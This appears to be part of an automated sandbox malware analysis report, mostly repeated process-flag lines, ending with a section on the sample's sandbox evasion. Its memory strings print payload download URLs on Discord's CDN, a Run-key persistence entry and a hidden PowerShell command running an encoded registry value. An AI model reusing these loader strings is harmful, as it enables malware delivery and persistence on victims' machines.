Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ieinstal.exe, 0000001E.00000002.398101781286.0000000003590000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398544109967.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNMAANEDS3HTTPS://CDN.DISCORDAPP.COM/ATTACHMENTS/933089029631639657/933089094899228722/4687_OIHOPVIA11.BIN
Source: powershell.exe, 00000019.00000002.398155865635.00000000092B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE<
Source: powershell.exe, 0000001A.00000002.398579916323.00000000085B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE\
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398153960658.0000000008EE0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398101781286.0000000003590000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398544109967.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: powershell.exe, 00000004.00000002.397151721605.0000000008334000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXENT
Source: powershell.exe, 00000019.00000002.398153960658.0000000008EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSHTML.TLBPROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSHTML.TLB
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNMAANEDS3\IMG_25254535627256.JPGHTTPS://CDN.DISCORDAPP.COM/ATTACHMENTS/933089228261294143/933089306719961188/IMG_25254535627256.JPGSOFTWARE\APPDATALOW\BILLIOND5C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE -WINDOWSTYLE HIDDEN $OBITUARY=(GET-ITEMPROPERTY -PATH 'HKCU:\SOFTWARE\APPDATALOW\').BILLIOND5;POWERSHELL.EXE -WINDOWSTYLE HIDDEN -ENCODEDCOMMAND($OBITUARY)HTTPS://CDN.DISCORDAPP.COM/ATTACHMENTS/933089029631639657/933089094899228722/4687_OIHOPVIA11.BIN
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6660 Thread sleep count: 9857 > 30 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6660 Thread sleep time: -49285s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
